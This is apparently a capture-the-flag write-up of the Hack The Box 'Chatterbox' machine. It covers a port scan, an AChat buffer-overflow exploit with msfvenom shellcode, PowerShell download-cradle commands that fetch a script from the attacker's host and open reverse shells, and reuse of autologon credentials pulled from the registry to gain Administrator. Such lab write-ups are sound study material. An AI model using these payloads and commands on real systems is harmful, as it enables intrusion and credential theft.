Hack The Box : Chatterbox
15 August, 2021
Starting off with an nmap scan
Nmap scan report for 10.10.10.74
Host is up, received user-set (0.43s latency).
Scanned at 2021-08-14 12:25:19 EDT for 3058s
Not shown: 65533 filtered ports
Reason: 65533 no-responses
PORT STATE SERVICE REASON VERSION
9255/tcp open http syn-ack ttl 127 AChat chat system httpd
|_http-favicon: Unknown favicon MD5: 0B6115FAE5429FEB9A494BEE6B18ABBE
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: AChat
|_http-title: Site doesn't have a title.
9256/tcp open achat syn-ack ttl 127 AChat chat system
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|8.1|7|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012:r2
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Embedded Standard 7 (91%), Microsoft Windows Server 2008 (90%), Microsoft Windows 7 or Windows Server 2008 R2 (90%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.91%E=4%D=8/14%OT=9255%CT=%CU=%PV=Y%DS=2%DC=T%G=N%TM=6117FA61%P=x86_64-pc-linux-gnu)
SEQ(SP=106%GCD=1%ISR=104%TI=I%TS=7)
SEQ(SP=107%GCD=1%ISR=104%TI=I%II=I%SS=S%TS=7)
OPS(O1=M54BNW8ST11%O2=M54BNW8ST11%O3=M54BNW8NNT11%O4=M54BNW8ST11%O5=M54BNW8ST11%O6=M54BST11)
WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)
ECN(R=Y%DF=Y%TG=80%W=2000%O=M54BNW8NNS%CC=N%Q=)
T1(R=Y%DF=Y%TG=80%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=N)
U1(R=N)
IE(R=Y%DFI=N%TG=80%CD=Z)
Uptime guess: 0.038 days (since Sat Aug 14 12:21:58 2021)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: Incremental
TRACEROUTE (using port 9256/tcp)
HOP RTT ADDRESS
1 344.37 ms 10.10.16.1
2 516.19 ms 10.10.10.74
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Aug 14 13:16:17 2021 -- 1 IP address (1 host up) scanned in 3060.68 seconds
The HTTP server didn't have anything at the root
$ curl -v http://10.10.10.74:9255/
* Trying 10.10.10.74:9255...
* Connected to 10.10.10.74 (10.10.10.74) port 9255 (#0)
> GET / HTTP/1.1
> Host: 10.10.10.74:9255
> User-Agent: curl/7.74.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 204 No Content
< Connection: close
< Server: AChat
<
* Closing connection 0
After looking around, I only found one remote buffer exploit attack that I thought of trying.
User
Instead of the command mentioned in the exploit, I used the shellcode for windows/shell/reverse_tcp payload but it didn't work. After a bunch of other failed payloads, ultimately the technique that worked was requesting for a PS script and then executing it.
$ msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell -c IEX (New-Object Net.WebClient).DownloadString('http://10.10.16.174:8000/mini.ps1')" -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
$ python2 36025.py
---->{P00F}!
$ nc -lvnp 4242
listening on [any] 4242 ...
connect to [10.10.16.174] from (UNKNOWN) [10.10.10.74] 49162
whoami
chatterbox\alfred
dir C:\
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---- 7/13/2009 10:37 PM PerfLogs
d-r-- 12/10/2017 1:35 PM Program Files
d-r-- 12/10/2017 9:21 AM Users
d---- 1/4/2021 3:51 AM Windows
-a--- 6/10/2009 5:42 PM 24 autoexec.bat
-a--- 6/10/2009 5:42 PM 10 config.sys
dir C:\Users\
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---- 12/10/2017 1:34 PM Administrator
d---- 12/10/2017 9:18 AM Alfred
d-r-- 4/11/2011 10:21 PM Public
dir C:\Users\Alfred\Desktop
Directory: C:\Users\Alfred\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar-- 8/15/2021 1:51 AM 34 user.txt
type C:\Users\Alfred\Desktop\user.txt
<flag>
Root
This user's privileges didn't have anything significant, so I couldn't try out the typical Windows privilege escalation exploits
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
systeminfo also showed a number of hotfixes installed
systeminfo
Host Name: CHATTERBOX
OS Name: Microsoft Windows 7 Professional
OS Version: 6.1.7601 Service Pack 1 Build 7601
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00371-222-9819843-86663
Original Install Date: 12/10/2017, 9:18:19 AM
System Boot Time: 8/15/2021, 1:51:15 AM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 2 Processor(s) Installed.
[01]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
[02]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-05:00) Eastern Time (US & Canada)
Total Physical Memory: 2,047 MB
Available Physical Memory: 1,483 MB
Virtual Memory: Max Size: 4,095 MB
Virtual Memory: Available: 3,381 MB
Virtual Memory: In Use: 714 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: \\CHATTERBOX
Hotfix(s): 183 Hotfix(s) Installed.
...
[182]: KB982018
[183]: KB4054518
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.74
I couldn't find a writable directory so didn't try running Winpeas or something similar.
I did find some autologon credentials
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\winlogon
ReportBootOk REG_SZ 1
Shell REG_SZ explorer.exe
PreCreateKnownFolders REG_SZ {A520A1A4-1780-4FF6-BD18-167343C5AF16}
Userinit REG_SZ C:\Windows\system32\userinit.exe,
VMApplet REG_SZ SystemPropertiesPerformance.exe /pagefile
AutoRestartShell REG_DWORD 0x1
Background REG_SZ 0 0 0
CachedLogonsCount REG_SZ 10
DebugServerCommand REG_SZ no
ForceUnlockLogon REG_DWORD 0x0
LegalNoticeCaption REG_SZ
LegalNoticeText REG_SZ
PasswordExpiryWarning REG_DWORD 0x5
PowerdownAfterShutdown REG_SZ 0
ShutdownWithoutLogon REG_SZ 0
WinStationsDisabled REG_SZ 0
DisableCAD REG_DWORD 0x1
scremoveoption REG_SZ 0
ShutdownFlags REG_DWORD 0x80000033
DefaultDomainName REG_SZ
DefaultUserName REG_SZ Alfred
AutoAdminLogon REG_SZ 1
DefaultPassword REG_SZ Welcome1!
My motive now was to see if I can use the credentials to logon as administrator. After looking around I couldn't find a straight forward "sudo su" substitute for powershell. The only way was to execute another powershell reverse shell as Administrator
PS C:\Windows\system32> $username = 'Administrator'
PS C:\Windows\system32> $password = 'Welcome1!'
PS C:\Windows\system32> $securePassword = ConvertTo-SecureString $password -AsPlainText -Force
PS C:\Windows\system32> $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
PS C:\Windows\system32> Start-Process powershell.exe -Credential $credential -ArgumentList("IEX (New-Object Net.WebClient).DownloadString('http://10.10.16.174:8000/mini.ps1')")
On my machine
$ nc -lvnp 4245
listening on [any] 4245 ...
connect to [10.10.16.174] from (UNKNOWN) [10.10.10.74] 49170
whoami
chatterbox\administrator
type C:\Users\Administrator\Desktop\root.txt
<flag>
Overall this looked a straight-forward machine, however trying out various payloads took some time!